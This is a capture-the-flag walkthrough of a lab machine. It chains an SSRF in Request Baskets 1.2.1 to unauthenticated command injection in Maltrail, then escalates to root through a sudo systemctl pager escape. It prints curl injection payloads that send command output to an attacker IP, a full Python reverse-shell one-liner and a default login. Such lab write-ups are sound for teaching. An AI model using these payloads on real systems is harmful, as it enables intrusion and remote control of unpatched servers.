Enumeration
Defining a helper variable containing the IP will make the following commands easier:
export ip=10.10.11.224
nmap $ip -p- -sC -sV
| Port | Service | Notes |
|---|---|---|
| 22 | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 |
| 80 | Unknown | filtered - hidden service? |
| 8338 | Unknown | filtered - hidden service? |
| 55555 | Unknown | Looks like http |
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux;
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
HTTP Port 55555
Examining the service hosted on port 55555 by opening it in a browser shows it’s running Request Baskets v1.2.1
Cross Site Request Forgery
A quick google search shows this is vulnerable to CVE-2023-27163 CSRF for Request Baskets v <= 1.2.1 Attempting the CVE with the example payload modified for this box
sudo nc -lvnp 80
curl --data '{"forward_url": "http://10.10.14.8","proxy_response": false,"insecure_tls": false,"expand_path": true,"capacity": 250}' http://10.10.11.224:55555/baskets/test
curl http://10.10.11.224:55555/test
The connection can be seen on the listener showing that the server did make the connection attempt. By now browsing to http://10.10.11.224:55555/web/test and authenticating with the returned token from the api call, the basket can be managed or deleted. In the basket settings there’s an option for Proxy Response which can be used to make this CSRF visible:
curl --data '{"forward_url": "http://127.0.0.1","proxy_response": true,"insecure_tls": false,"expand_path": true}' http://10.10.11.224:55555/baskets/test
curl http://10.10.11.224:55555/test
An instance of Maltrail v0.53 is running on the port and shown by the reverse proxy. A search finds an Unauthenticated OS Command Injection for Maltrail v<= 0.54
Fuzzing the directory
A fuzz of the service proxied finds a index directory which has a login form. The login form when used sends a post request to the login sub directory endpoint.
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.224:55555/test/FUZZ
The Default Password admin:changeme! works as login credentials, however the page redirects out of the proxy and no further information can be learned after logging in.
Using the following test RCE payload as per the CVE:
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 127.0.0.1:55555/test`'
On the monitoring dashboard at http://10.10.11.224:55555/web/test a get request can be observed after the payload has been sent, indicating that the Maltrail application has executed the curl and made the connection back to the service, proving the RCE works.
Testing for remote connection back to the attacker pc, a remote listener can be set up and the local ip used in the payload to see if the application can make a cal back:
sudo nc -lvnp 80
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 10.10.14.8`'
# testing data back
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 10.10.14.8 --data /somedata`'
# test chaining
curl http://10.10.11.224:55555/test/login --data 'username=;`id | curl 10.10.14.8 --data /somedata`'
# testing returning some data
curl http://10.10.11.224:55555/test/login --data 'username=;`curl 10.10.14.8 --data "$(python3 --version)"`'
The reverse listener shows the connection was received, proving a remote connection can be established with this method and that python3 is available.
Reverse Shell
A reverse payload can be sent to establish a reverse shell back to a listener:
nc -lvnp 4444
payload="python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
curl http://10.10.11.224:55555/test/login --data 'username=;`'$payload'`'
# conneciton established
cd
cat user.txt
# Upgrading to full tty
#python3 -c 'import pty; pty.spawn("/bin/bash")'
#(inside the nc session) CTRL+Z
#stty raw -echo; fg
#ls; export SHELL=/bin/bash; export TERM=screen; stty rows 16 columns 70; reset;
Privilege Escalation
Checking sudo privileges of the user after upgrading to a full tty
sudo -l
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
By running this code the systemctl status page shows. This is shown through the binary less which means less can be run as root by the user. Since less can be used to run commands, this can be used to gain a root shell by entering in !/bin/bash